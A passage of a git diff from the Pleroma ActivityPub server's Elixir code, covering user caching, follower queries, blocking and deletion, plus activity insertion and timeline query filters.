	Cachex.put(:user_cache, "nickname:#{user.nickname}", user)
	Cachex.put(:user_cache, "user_info:#{user.id}", user_info(user))
	{:ok, user}
	else
	e -> e
	end
	end

	def invalidate_cache(user) do
	Cachex.del(:user_cache, "ap_id:#{user.ap_id}")
	Cachex.del(:user_cache, "nickname:#{user.nickname}")
	Cachex.del(:user_cache, "user_info:#{user.id}")
	end

	def get_cached_by_ap_id(ap_id) do
	key = "ap_id:#{ap_id}"
	Cachex.fetch!(:user_cache, key, fn _ -> get_by_ap_id(ap_id) end)
	end

	def get_cached_by_id(id) do
	key = "id:#{id}"

	ap_id =
	Cachex.fetch!(:user_cache, key, fn _ ->
	user = get_by_id(id)

	if user do
	Cachex.put(:user_cache, "ap_id:#{user.ap_id}", user)
	{:commit, user.ap_id}
	else
	{:ignore, ""}
	end
	end)

	get_cached_by_ap_id(ap_id)
	end

	def get_cached_by_nickname(nickname) do
	key = "nickname:#{nickname}"
	Cachex.fetch!(:user_cache, key, fn _ -> get_or_fetch_by_nickname(nickname) end)
	end

	def get_cached_by_nickname_or_id(nickname_or_id) do
	get_cached_by_id(nickname_or_id) \|\| get_cached_by_nickname(nickname_or_id)
	end

	def get_by_nickname(nickname) do
	Repo.get_by(User, nickname: nickname) \|\|
	if Regex.match?(~r(@#{Pleroma.Web.Endpoint.host()})i, nickname) do
	[local_nickname, _] = String.split(nickname, "@")
	Repo.get_by(User, nickname: local_nickname)
	end
	end

	def get_by_nickname_or_email(nickname_or_email) do
	case user = Repo.get_by(User, nickname: nickname_or_email) do
	%User{} -> user
	nil -> Repo.get_by(User, email: nickname_or_email)
	end
	end

	def get_cached_user_info(user) do
	key = "user_info:#{user.id}"
	Cachex.fetch!(:user_cache, key, fn _ -> user_info(user) end)
	end

	def fetch_by_nickname(nickname) do
	ap_try = ActivityPub.make_user_from_nickname(nickname)

	case ap_try do
	{:ok, user} -> {:ok, user}
	_ -> OStatus.make_user(nickname)
	end
	end

	def get_or_fetch_by_nickname(nickname) do
	with %User{} = user <- get_by_nickname(nickname) do
	user
	else
	_e ->
	with [_nick, _domain] <- String.split(nickname, "@"),
	{:ok, user} <- fetch_by_nickname(nickname) do
	user
	else
	_e -> nil
	end
	end
	end

	def get_followers_query(%User{id: id, follower_address: follower_address}, nil) do
	from(
	u in User,
	where: fragment("? <@ ?", ^[follower_address], u.following),
	where: u.id != ^id
	)
	end

	def get_followers_query(user, page) do
	from(
	u in get_followers_query(user, nil),
	limit: 20,
	offset: ^((page - 1) * 20)
	)
	end

	def get_followers_query(user), do: get_followers_query(user, nil)

	def get_followers(user, page \\ nil) do
	q = get_followers_query(user, page)

	{:ok, Repo.all(q)}
	end

	def get_friends_query(%User{id: id, following: following}, nil) do
	from(
	u in User,
	where: u.follower_address in ^following,
	where: u.id != ^id
	)
	end

	def get_friends_query(user, page) do
	from(
	u in get_friends_query(user, nil),
	limit: 20,
	offset: ^((page - 1) * 20)
	)
	end

	def get_friends_query(user), do: get_friends_query(user, nil)

	def get_friends(user, page \\ nil) do
	q = get_friends_query(user, page)

	{:ok, Repo.all(q)}
	end

	def get_follow_requests_query(%User{} = user) do
	from(
	a in Activity,
	where:
	fragment(
	"? ->> 'type' = 'Follow'",
	a.data
	),
	where:
	fragment(
	"? ->> 'state' = 'pending'",
	a.data
	),
	where:
	fragment(
	"? @> ?",
	a.data,
	^%{"object" => user.ap_id}
	)
	)
	end

	def get_follow_requests(%User{} = user) do
	q = get_follow_requests_query(user)
	reqs = Repo.all(q)

	users =
	Enum.map(reqs, fn req -> req.actor end)
	\|> Enum.uniq()
	\|> Enum.map(fn ap_id -> get_by_ap_id(ap_id) end)
	\|> Enum.filter(fn u -> !is_nil(u) end)
	\|> Enum.filter(fn u -> !following?(u, user) end)

	{:ok, users}
	end

	def increase_note_count(%User{} = user) do
	info_cng = User.Info.add_to_note_count(user.info, 1)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def decrease_note_count(%User{} = user) do
	info_cng = User.Info.add_to_note_count(user.info, -1)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def update_note_count(%User{} = user) do
	note_count_query =
	from(
	a in Object,
	where: fragment("?->>'actor' = ? and ?->>'type' = 'Note'", a.data, ^user.ap_id, a.data),
	select: count(a.id)
	)

	note_count = Repo.one(note_count_query)

	info_cng = User.Info.set_note_count(user.info, note_count)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def update_follower_count(%User{} = user) do
	follower_count_query =
	from(
	u in User,
	where: ^user.follower_address in u.following,
	where: u.id != ^user.id,
	select: count(u.id)
	)

	follower_count = Repo.one(follower_count_query)

	info_cng =
	user.info
	\|> User.Info.set_follower_count(follower_count)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def get_users_from_set_query(ap_ids, false) do
	from(
	u in User,
	where: u.ap_id in ^ap_ids
	)
	end

	def get_users_from_set_query(ap_ids, true) do
	query = get_users_from_set_query(ap_ids, false)

	from(
	u in query,
	where: u.local == true
	)
	end

	def get_users_from_set(ap_ids, local_only \\ true) do
	get_users_from_set_query(ap_ids, local_only)
	\|> Repo.all()
	end

	def get_recipients_from_activity(%Activity{recipients: to}) do
	query =
	from(
	u in User,
	where: u.ap_id in ^to,
	or_where: fragment("? && ?", u.following, ^to)
	)

	query = from(u in query, where: u.local == true)

	Repo.all(query)
	end

	def search(query, resolve \\ false) do
	# strip the beginning @ off if there is a query
	query = String.trim_leading(query, "@")

	if resolve do
	User.get_or_fetch_by_nickname(query)
	end

	inner =
	from(
	u in User,
	select_merge: %{
	search_distance:
	fragment(
	"? <-> (? \|\| coalesce(?, ''))",
	^query,
	u.nickname,
	u.name
	)
	},
	where: not is_nil(u.nickname)
	)

	q =
	from(
	s in subquery(inner),
	order_by: s.search_distance,
	limit: 20
	)

	Repo.all(q)
	end

	def blocks_import(%User{} = blocker, blocked_identifiers) when is_list(blocked_identifiers) do
	Enum.map(
	blocked_identifiers,
	fn blocked_identifier ->
	with %User{} = blocked <- get_or_fetch(blocked_identifier),
	{:ok, blocker} <- block(blocker, blocked),
	{:ok, _} <- ActivityPub.block(blocker, blocked) do
	blocked
	else
	err ->
	Logger.debug("blocks_import failed for #{blocked_identifier} with: #{inspect(err)}")
	err
	end
	end
	)
	end

	def block(blocker, %User{ap_id: ap_id} = blocked) do
	# sever any follow relationships to prevent leaks per activitypub (Pleroma issue #213)
	blocker =
	if following?(blocker, blocked) do
	{:ok, blocker, _} = unfollow(blocker, blocked)
	blocker
	else
	blocker
	end

	if following?(blocked, blocker) do
	unfollow(blocked, blocker)
	end

	info_cng =
	blocker.info
	\|> User.Info.add_to_block(ap_id)

	cng =
	change(blocker)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	# helper to handle the block given only an actor's AP id
	def block(blocker, %{ap_id: ap_id}) do
	block(blocker, User.get_by_ap_id(ap_id))
	end

	def unblock(blocker, %{ap_id: ap_id}) do
	info_cng =
	blocker.info
	\|> User.Info.remove_from_block(ap_id)

	cng =
	change(blocker)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def blocks?(user, %{ap_id: ap_id}) do
	blocks = user.info.blocks
	domain_blocks = user.info.domain_blocks
	%{host: host} = URI.parse(ap_id)

	Enum.member?(blocks, ap_id) \|\|
	Enum.any?(domain_blocks, fn domain ->
	host == domain
	end)
	end

	def blocked_users(user),
	do: Repo.all(from(u in User, where: u.ap_id in ^user.info.blocks))

	def block_domain(user, domain) do
	info_cng =
	user.info
	\|> User.Info.add_to_domain_block(domain)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def unblock_domain(user, domain) do
	info_cng =
	user.info
	\|> User.Info.remove_from_domain_block(domain)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	- def local_user_query() do
	+ def local_user_query do
	from(
	u in User,
	where: u.local == true,
	where: not is_nil(u.nickname)
	)
	end

	- def moderator_user_query() do
	+ def active_local_user_query do
	+ from(
	+ u in local_user_query(),
	+ where: fragment("?->'deactivated' @> 'false'", u.info)
	+ )
	+ end
	+
	+ def moderator_user_query do
	from(
	u in User,
	where: u.local == true,
	where: fragment("?->'is_moderator' @> 'true'", u.info)
	)
	end

	def deactivate(%User{} = user, status \\ true) do
	info_cng = User.Info.set_activation_status(user.info, status)

	cng =
	change(user)
	\|> put_embed(:info, info_cng)

	update_and_set_cache(cng)
	end

	def delete(%User{} = user) do
	{:ok, user} = User.deactivate(user)

	# Remove all relationships
	{:ok, followers} = User.get_followers(user)

	followers
	\|> Enum.each(fn follower -> User.unfollow(follower, user) end)

	{:ok, friends} = User.get_friends(user)

	friends
	\|> Enum.each(fn followed -> User.unfollow(user, followed) end)

	query = from(a in Activity, where: a.actor == ^user.ap_id)

	Repo.all(query)
	\|> Enum.each(fn activity ->
	case activity.data["type"] do
	"Create" ->
	ActivityPub.delete(Object.normalize(activity.data["object"]))

	# TODO: Do something with likes, follows, repeats.
	_ ->
	"Doing nothing"
	end
	end)

	{:ok, user}
	end

	def html_filter_policy(%User{info: %{no_rich_text: true}}) do
	Pleroma.HTML.Scrubber.TwitterText
	end

	@default_scrubbers Pleroma.Config.get([:markup, :scrub_policy])

	def html_filter_policy(_), do: @default_scrubbers

	def get_or_fetch_by_ap_id(ap_id) do
	user = get_by_ap_id(ap_id)

	if !is_nil(user) and !User.needs_update?(user) do
	user
	else
	ap_try = ActivityPub.make_user_from_ap_id(ap_id)

	case ap_try do
	{:ok, user} ->
	user

	_ ->
	case OStatus.make_user(ap_id) do
	{:ok, user} -> user
	_ -> {:error, "Could not fetch by AP id"}
	end
	end
	end
	end

	def get_or_create_instance_user do
	relay_uri = "#{Pleroma.Web.Endpoint.url()}/relay"

	if user = get_by_ap_id(relay_uri) do
	user
	else
	changes =
	%User{info: %User.Info{}}
	\|> cast(%{}, [:ap_id, :nickname, :local])
	\|> put_change(:ap_id, relay_uri)
	\|> put_change(:nickname, nil)
	\|> put_change(:local, true)
	\|> put_change(:follower_address, relay_uri <> "/followers")

	{:ok, user} = Repo.insert(changes)
	user
	end
	end

	# AP style
	def public_key_from_info(%{
	source_data: %{"publicKey" => %{"publicKeyPem" => public_key_pem}}
	}) do
	key =
	public_key_pem
	\|> :public_key.pem_decode()
	\|> hd()
	\|> :public_key.pem_entry_decode()

	{:ok, key}
	end

	# OStatus Magic Key
	def public_key_from_info(%{magic_key: magic_key}) do
	{:ok, Pleroma.Web.Salmon.decode_key(magic_key)}
	end

	def get_public_key_for_ap_id(ap_id) do
	with %User{} = user <- get_or_fetch_by_ap_id(ap_id),
	{:ok, public_key} <- public_key_from_info(user.info) do
	{:ok, public_key}
	else
	_ -> :error
	end
	end

	defp blank?(""), do: nil
	defp blank?(n), do: n

	def insert_or_update_user(data) do
	data =
	data
	\|> Map.put(:name, blank?(data[:name]) \|\| data[:nickname])

	cs = User.remote_user_creation(data)

	Repo.insert(cs, on_conflict: :replace_all, conflict_target: :nickname)
	end

	def ap_enabled?(%User{local: true}), do: true
	def ap_enabled?(%User{info: info}), do: info.ap_enabled
	def ap_enabled?(_), do: false

	@doc "Gets or fetch a user by uri or nickname."
	@spec get_or_fetch(String.t()) :: User.t()
	def get_or_fetch("http" <> _host = uri), do: get_or_fetch_by_ap_id(uri)
	def get_or_fetch(nickname), do: get_or_fetch_by_nickname(nickname)

	# wait a period of time and return newest version of the User structs
	# this is because we have synchronous follow APIs and need to simulate them
	# with an async handshake
	def wait_and_refresh(_, %User{local: true} = a, %User{local: true} = b) do
	with %User{} = a <- Repo.get(User, a.id),
	%User{} = b <- Repo.get(User, b.id) do
	{:ok, a, b}
	else
	_e ->
	:error
	end
	end

	def wait_and_refresh(timeout, %User{} = a, %User{} = b) do
	with :ok <- :timer.sleep(timeout),
	%User{} = a <- Repo.get(User, a.id),
	%User{} = b <- Repo.get(User, b.id) do
	{:ok, a, b}
	else
	_e ->
	:error
	end
	end

	def parse_bio(bio, user \\ %User{info: %{source_data: %{}}})
	def parse_bio(nil, _user), do: ""
	def parse_bio(bio, _user) when bio == "", do: bio

	def parse_bio(bio, user) do
	mentions = Formatter.parse_mentions(bio)
	tags = Formatter.parse_tags(bio)

	emoji =
	(user.info.source_data["tag"] \|\| [])
	\|> Enum.filter(fn %{"type" => t} -> t == "Emoji" end)
	\|> Enum.map(fn %{"icon" => %{"url" => url}, "name" => name} ->
	{String.trim(name, ":"), url}
	end)

	bio
	\|> CommonUtils.format_input(mentions, tags, "text/plain")
	\|> Formatter.emojify(emoji)
	end

	def tag(user_identifiers, tags) when is_list(user_identifiers) do
	Repo.transaction(fn ->
	for user_identifier <- user_identifiers, do: tag(user_identifier, tags)
	end)
	end

	def tag(nickname, tags) when is_binary(nickname),
	do: tag(User.get_by_nickname(nickname), tags)

	def tag(%User{} = user, tags),
	do: update_tags(user, Enum.uniq((user.tags \|\| []) ++ normalize_tags(tags)))

	def untag(user_identifiers, tags) when is_list(user_identifiers) do
	Repo.transaction(fn ->
	for user_identifier <- user_identifiers, do: untag(user_identifier, tags)
	end)
	end

	def untag(nickname, tags) when is_binary(nickname),
	do: untag(User.get_by_nickname(nickname), tags)

	def untag(%User{} = user, tags),
	do: update_tags(user, (user.tags \|\| []) -- normalize_tags(tags))

	defp update_tags(%User{} = user, new_tags) do
	{:ok, updated_user} =
	user
	\|> change(%{tags: new_tags})
	\|> Repo.update()

	updated_user
	end

	defp normalize_tags(tags) do
	[tags]
	\|> List.flatten()
	\|> Enum.map(&String.downcase(&1))
	end

	defp local_nickname_regex() do
	if Pleroma.Config.get([:instance, :extended_nickname_format]) do
	@extended_local_nickname_regex
	else
	@strict_local_nickname_regex
	end
	end
	+
	+ def error_user(ap_id) do
	+ %User{
	+ name: ap_id,
	+ ap_id: ap_id,
	+ info: %User.Info{},
	+ nickname: "erroruser@example.com",
	+ inserted_at: NaiveDateTime.utc_now()
	+ }
	+ end
	end
	diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
	index 9c1eb377f..5b87f7462 100644
	--- a/lib/pleroma/web/activity_pub/activity_pub.ex
	+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
	@@ -1,861 +1,851 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.ActivityPub do
	alias Pleroma.{Activity, Repo, Object, Upload, User, Notification}
	alias Pleroma.Web.ActivityPub.{Transmogrifier, MRF}
	alias Pleroma.Web.WebFinger
	alias Pleroma.Web.Federator
	alias Pleroma.Web.OStatus
	import Ecto.Query
	import Pleroma.Web.ActivityPub.Utils
	require Logger

	@httpoison Application.get_env(:pleroma, :httpoison)

	# For Announce activities, we filter the recipients based on following status for any actors
	# that match actual users. See issue #164 for more information about why this is necessary.
	defp get_recipients(%{"type" => "Announce"} = data) do
	to = data["to"] \|\| []
	cc = data["cc"] \|\| []
	recipients = to ++ cc
	actor = User.get_cached_by_ap_id(data["actor"])

	recipients
	\|> Enum.filter(fn recipient ->
	case User.get_cached_by_ap_id(recipient) do
	nil ->
	true

	user ->
	User.following?(user, actor)
	end
	end)

	{recipients, to, cc}
	end

	defp get_recipients(data) do
	to = data["to"] \|\| []
	cc = data["cc"] \|\| []
	recipients = to ++ cc
	{recipients, to, cc}
	end

	defp check_actor_is_active(actor) do
	if not is_nil(actor) do
	with user <- User.get_cached_by_ap_id(actor),
	false <- user.info.deactivated do
	:ok
	else
	_e -> :reject
	end
	else
	:ok
	end
	end

	defp check_remote_limit(%{"object" => %{"content" => content}}) do
	limit = Pleroma.Config.get([:instance, :remote_limit])
	String.length(content) <= limit
	end

	defp check_remote_limit(_), do: true

	def insert(map, local \\ true) when is_map(map) do
	with nil <- Activity.normalize(map),
	map <- lazy_put_activity_defaults(map),
	:ok <- check_actor_is_active(map["actor"]),
	{_, true} <- {:remote_limit_error, check_remote_limit(map)},
	{:ok, map} <- MRF.filter(map),
	:ok <- insert_full_object(map) do
	{recipients, _, _} = get_recipients(map)

	{:ok, activity} =
	Repo.insert(%Activity{
	data: map,
	local: local,
	actor: map["actor"],
	recipients: recipients
	})

	Notification.create_notifications(activity)
	stream_out(activity)
	{:ok, activity}
	else
	%Activity{} = activity -> {:ok, activity}
	error -> {:error, error}
	end
	end

	def stream_out(activity) do
	public = "https://www.w3.org/ns/activitystreams#Public"

	if activity.data["type"] in ["Create", "Announce"] do
	Pleroma.Web.Streamer.stream("user", activity)
	Pleroma.Web.Streamer.stream("list", activity)

	if Enum.member?(activity.data["to"], public) do
	Pleroma.Web.Streamer.stream("public", activity)

	if activity.local do
	Pleroma.Web.Streamer.stream("public:local", activity)
	end

	activity.data["object"]
	\|> Map.get("tag", [])
	\|> Enum.filter(fn tag -> is_bitstring(tag) end)
	\|> Enum.map(fn tag -> Pleroma.Web.Streamer.stream("hashtag:" <> tag, activity) end)

	if activity.data["object"]["attachment"] != [] do
	Pleroma.Web.Streamer.stream("public:media", activity)

	if activity.local do
	Pleroma.Web.Streamer.stream("public:local:media", activity)
	end
	end
	else
	if !Enum.member?(activity.data["cc"] \|\| [], public) &&
	!Enum.member?(
	activity.data["to"],
	User.get_by_ap_id(activity.data["actor"]).follower_address
	),
	do: Pleroma.Web.Streamer.stream("direct", activity)
	end
	end
	end

	def create(%{to: to, actor: actor, context: context, object: object} = params) do
	additional = params[:additional] \|\| %{}
	# only accept false as false value
	local = !(params[:local] == false)
	published = params[:published]

	with create_data <-
	make_create_data(
	%{to: to, actor: actor, published: published, context: context, object: object},
	additional
	),
	{:ok, activity} <- insert(create_data, local),
	:ok <- maybe_federate(activity),
	{:ok, _actor} <- User.increase_note_count(actor) do
	{:ok, activity}
	end
	end

	def accept(%{to: to, actor: actor, object: object} = params) do
	# only accept false as false value
	local = !(params[:local] == false)

	with data <- %{"to" => to, "type" => "Accept", "actor" => actor, "object" => object},
	{:ok, activity} <- insert(data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	end
	end

	def reject(%{to: to, actor: actor, object: object} = params) do
	# only accept false as false value
	local = !(params[:local] == false)

	with data <- %{"to" => to, "type" => "Reject", "actor" => actor, "object" => object},
	{:ok, activity} <- insert(data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	end
	end

	def update(%{to: to, cc: cc, actor: actor, object: object} = params) do
	# only accept false as false value
	local = !(params[:local] == false)

	with data <- %{
	"to" => to,
	"cc" => cc,
	"type" => "Update",
	"actor" => actor,
	"object" => object
	},
	{:ok, activity} <- insert(data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	end
	end

	# TODO: This is weird, maybe we shouldn't check here if we can make the activity.
	def like(
	%User{ap_id: ap_id} = user,
	%Object{data: %{"id" => _}} = object,
	activity_id \\ nil,
	local \\ true
	) do
	with nil <- get_existing_like(ap_id, object),
	like_data <- make_like_data(user, object, activity_id),
	{:ok, activity} <- insert(like_data, local),
	{:ok, object} <- add_like_to_object(activity, object),
	:ok <- maybe_federate(activity) do
	{:ok, activity, object}
	else
	%Activity{} = activity -> {:ok, activity, object}
	error -> {:error, error}
	end
	end

	def unlike(
	%User{} = actor,
	%Object{} = object,
	activity_id \\ nil,
	local \\ true
	) do
	with %Activity{} = like_activity <- get_existing_like(actor.ap_id, object),
	unlike_data <- make_unlike_data(actor, like_activity, activity_id),
	{:ok, unlike_activity} <- insert(unlike_data, local),
	{:ok, _activity} <- Repo.delete(like_activity),
	{:ok, object} <- remove_like_from_object(like_activity, object),
	:ok <- maybe_federate(unlike_activity) do
	{:ok, unlike_activity, like_activity, object}
	else
	_e -> {:ok, object}
	end
	end

	def announce(
	%User{ap_id: _} = user,
	%Object{data: %{"id" => _}} = object,
	activity_id \\ nil,
	local \\ true
	) do
	with true <- is_public?(object),
	announce_data <- make_announce_data(user, object, activity_id),
	{:ok, activity} <- insert(announce_data, local),
	{:ok, object} <- add_announce_to_object(activity, object),
	:ok <- maybe_federate(activity) do
	{:ok, activity, object}
	else
	error -> {:error, error}
	end
	end

	def unannounce(
	%User{} = actor,
	%Object{} = object,
	activity_id \\ nil,
	local \\ true
	) do
	with %Activity{} = announce_activity <- get_existing_announce(actor.ap_id, object),
	unannounce_data <- make_unannounce_data(actor, announce_activity, activity_id),
	{:ok, unannounce_activity} <- insert(unannounce_data, local),
	:ok <- maybe_federate(unannounce_activity),
	{:ok, _activity} <- Repo.delete(announce_activity),
	{:ok, object} <- remove_announce_from_object(announce_activity, object) do
	{:ok, unannounce_activity, object}
	else
	_e -> {:ok, object}
	end
	end

	def follow(follower, followed, activity_id \\ nil, local \\ true) do
	with data <- make_follow_data(follower, followed, activity_id),
	{:ok, activity} <- insert(data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	end
	end

	def unfollow(follower, followed, activity_id \\ nil, local \\ true) do
	with %Activity{} = follow_activity <- fetch_latest_follow(follower, followed),
	{:ok, follow_activity} <- update_follow_state(follow_activity, "cancelled"),
	unfollow_data <- make_unfollow_data(follower, followed, follow_activity, activity_id),
	{:ok, activity} <- insert(unfollow_data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	end
	end

	def delete(%Object{data: %{"id" => id, "actor" => actor}} = object, local \\ true) do
	user = User.get_cached_by_ap_id(actor)

	data = %{
	"type" => "Delete",
	"actor" => actor,
	"object" => id,
	"to" => [user.follower_address, "https://www.w3.org/ns/activitystreams#Public"]
	}

	with {:ok, _} <- Object.delete(object),
	{:ok, activity} <- insert(data, local),
	:ok <- maybe_federate(activity),
	{:ok, _actor} <- User.decrease_note_count(user) do
	{:ok, activity}
	end
	end

	def block(blocker, blocked, activity_id \\ nil, local \\ true) do
	ap_config = Application.get_env(:pleroma, :activitypub)
	unfollow_blocked = Keyword.get(ap_config, :unfollow_blocked)
	outgoing_blocks = Keyword.get(ap_config, :outgoing_blocks)

	with true <- unfollow_blocked do
	follow_activity = fetch_latest_follow(blocker, blocked)

	if follow_activity do
	unfollow(blocker, blocked, nil, local)
	end
	end

	with true <- outgoing_blocks,
	block_data <- make_block_data(blocker, blocked, activity_id),
	{:ok, activity} <- insert(block_data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	else
	_e -> {:ok, nil}
	end
	end

	def unblock(blocker, blocked, activity_id \\ nil, local \\ true) do
	with %Activity{} = block_activity <- fetch_latest_block(blocker, blocked),
	unblock_data <- make_unblock_data(blocker, blocked, block_activity, activity_id),
	{:ok, activity} <- insert(unblock_data, local),
	:ok <- maybe_federate(activity) do
	{:ok, activity}
	end
	end

	def fetch_activities_for_context(context, opts \\ %{}) do
	public = ["https://www.w3.org/ns/activitystreams#Public"]

	recipients =
	if opts["user"], do: [opts["user"].ap_id \| opts["user"].following] ++ public, else: public

	query = from(activity in Activity)

	query =
	query
	\|> restrict_blocked(opts)
	\|> restrict_recipients(recipients, opts["user"])

	query =
	from(
	activity in query,
	where:
	fragment(
	"?->>'type' = ? and ?->>'context' = ?",
	activity.data,
	"Create",
	activity.data,
	^context
	),
	order_by: [desc: :id]
	)

	Repo.all(query)
	end

	def fetch_public_activities(opts \\ %{}) do
	q = fetch_activities_query(["https://www.w3.org/ns/activitystreams#Public"], opts)

	q
	\|> restrict_unlisted()
	\|> Repo.all()
	\|> Enum.reverse()
	end

	@valid_visibilities ~w[direct unlisted public private]

	defp restrict_visibility(query, %{visibility: visibility})
	when visibility in @valid_visibilities do
	query =
	from(
	a in query,
	where:
	fragment("activity_visibility(?, ?, ?) = ?", a.actor, a.recipients, a.data, ^visibility)
	)

	Ecto.Adapters.SQL.to_sql(:all, Repo, query)

	query
	end

	defp restrict_visibility(_query, %{visibility: visibility})
	when visibility not in @valid_visibilities do
	Logger.error("Could not restrict visibility to #{visibility}")
	end

	defp restrict_visibility(query, _visibility), do: query

	def fetch_user_activities(user, reading_user, params \\ %{}) do
	params =
	params
	\|> Map.put("type", ["Create", "Announce"])
	\|> Map.put("actor_id", user.ap_id)
	\|> Map.put("whole_db", true)
	\|> Map.put("pinned_activity_ids", user.info.pinned_activities)

	recipients =
	if reading_user do
	["https://www.w3.org/ns/activitystreams#Public"] ++
	[reading_user.ap_id \| reading_user.following]
	else
	["https://www.w3.org/ns/activitystreams#Public"]
	end

	fetch_activities(recipients, params)
	\|> Enum.reverse()
	end

	defp restrict_since(query, %{"since_id" => since_id}) do
	from(activity in query, where: activity.id > ^since_id)
	end

	defp restrict_since(query, _), do: query

	defp restrict_tag(query, %{"tag" => tag}) do
	from(
	activity in query,
	where: fragment("? <@ (? #> '{\"object\",\"tag\"}')", ^tag, activity.data)
	)
	end

	defp restrict_tag(query, _), do: query

	defp restrict_to_cc(query, recipients_to, recipients_cc) do
	from(
	activity in query,
	where:
	fragment(
	"(?->'to' \\?\| ?) or (?->'cc' \\?\| ?)",
	activity.data,
	^recipients_to,
	activity.data,
	^recipients_cc
	)
	)
	end

	defp restrict_recipients(query, [], _user), do: query

	defp restrict_recipients(query, recipients, nil) do
	from(activity in query, where: fragment("? && ?", ^recipients, activity.recipients))
	end

	defp restrict_recipients(query, recipients, user) do
	from(
	activity in query,
	where: fragment("? && ?", ^recipients, activity.recipients),
	or_where: activity.actor == ^user.ap_id
	)
	end

	defp restrict_limit(query, %{"limit" => limit}) do
	from(activity in query, limit: ^limit)
	end

	defp restrict_limit(query, _), do: query

	defp restrict_local(query, %{"local_only" => true}) do
	from(activity in query, where: activity.local == true)
	end

	defp restrict_local(query, _), do: query

	defp restrict_max(query, %{"max_id" => max_id}) do
	from(activity in query, where: activity.id < ^max_id)
	end

	defp restrict_max(query, _), do: query

	defp restrict_actor(query, %{"actor_id" => actor_id}) do
	from(activity in query, where: activity.actor == ^actor_id)
	end

	defp restrict_actor(query, _), do: query

	defp restrict_type(query, %{"type" => type}) when is_binary(type) do
	restrict_type(query, %{"type" => [type]})
	end

	defp restrict_type(query, %{"type" => type}) do
	from(activity in query, where: fragment("?->>'type' = ANY(?)", activity.data, ^type))
	end

	defp restrict_type(query, _), do: query

	defp restrict_favorited_by(query, %{"favorited_by" => ap_id}) do
	from(
	activity in query,
	where: fragment("? <@ (? #> '{\"object\",\"likes\"}')", ^ap_id, activity.data)
	)
	end

	defp restrict_favorited_by(query, _), do: query

	defp restrict_media(query, %{"only_media" => val}) when val == "true" or val == "1" do
	from(
	activity in query,
	where: fragment("not (? #> '{\"object\",\"attachment\"}' = ?)", activity.data, ^[])
	)
	end

	defp restrict_media(query, _), do: query

	defp restrict_replies(query, %{"exclude_replies" => val}) when val == "true" or val == "1" do
	from(
	activity in query,
	where: fragment("?->'object'->>'inReplyTo' is null", activity.data)
	)
	end

	defp restrict_replies(query, _), do: query

	defp restrict_reblogs(query, %{"exclude_reblogs" => val}) when val == "true" or val == "1" do
	from(activity in query, where: fragment("?->>'type' != 'Announce'", activity.data))
	end

	defp restrict_reblogs(query, _), do: query

	- # Only search through last 100_000 activities by default
	- defp restrict_recent(query, %{"whole_db" => true}), do: query
	-
	- defp restrict_recent(query, _) do
	- since = (Repo.aggregate(Activity, :max, :id) \|\| 0) - 100_000
	-
	- from(activity in query, where: activity.id > ^since)
	- end
	-
	defp restrict_blocked(query, %{"blocking_user" => %User{info: info}}) do
	blocks = info.blocks \|\| []
	domain_blocks = info.domain_blocks \|\| []

	from(
	activity in query,
	where: fragment("not (? = ANY(?))", activity.actor, ^blocks),
	where: fragment("not (?->'to' \\?\| ?)", activity.data, ^blocks),
	where: fragment("not (split_part(?, '/', 3) = ANY(?))", activity.actor, ^domain_blocks)
	)
	end

	defp restrict_blocked(query, _), do: query

	defp restrict_unlisted(query) do
	from(
	activity in query,
	where:
	fragment(
	"not (coalesce(?->'cc', '{}'::jsonb) \\?\| ?)",
	activity.data,
	^["https://www.w3.org/ns/activitystreams#Public"]
	)
	)
	end

	defp restrict_pinned(query, %{"pinned" => "true", "pinned_activity_ids" => ids}) do
	from(activity in query, where: activity.id in ^ids)
	end

	defp restrict_pinned(query, _), do: query

	def fetch_activities_query(recipients, opts \\ %{}) do
	base_query =
	from(
	activity in Activity,
	limit: 20,
	order_by: [fragment("? desc nulls last", activity.id)]
	)

	base_query
	\|> restrict_recipients(recipients, opts["user"])
	\|> restrict_tag(opts)
	\|> restrict_since(opts)
	\|> restrict_local(opts)
	\|> restrict_limit(opts)
	\|> restrict_max(opts)
	\|> restrict_actor(opts)
	\|> restrict_type(opts)
	\|> restrict_favorited_by(opts)
	- \|> restrict_recent(opts)
	\|> restrict_blocked(opts)
	\|> restrict_media(opts)
	\|> restrict_visibility(opts)
	\|> restrict_replies(opts)
	\|> restrict_reblogs(opts)
	\|> restrict_pinned(opts)
	end

	def fetch_activities(recipients, opts \\ %{}) do
	fetch_activities_query(recipients, opts)
	\|> Repo.all()
	\|> Enum.reverse()
	end

	def fetch_activities_bounded(recipients_to, recipients_cc, opts \\ %{}) do
	fetch_activities_query([], opts)
	\|> restrict_to_cc(recipients_to, recipients_cc)
	\|> Repo.all()
	\|> Enum.reverse()
	end

	def upload(file, opts \\ []) do
	with {:ok, data} <- Upload.store(file, opts) do
	obj_data =
	if opts[:actor] do
	Map.put(data, "actor", opts[:actor])
	else
	data
	end

	Repo.insert(%Object{data: obj_data})
	end
	end

	def user_data_from_user_object(data) do
	avatar =
	data["icon"]["url"] &&
	%{
	"type" => "Image",
	"url" => [%{"href" => data["icon"]["url"]}]
	}

	banner =
	data["image"]["url"] &&
	%{
	"type" => "Image",
	"url" => [%{"href" => data["image"]["url"]}]
	}

	locked = data["manuallyApprovesFollowers"] \|\| false
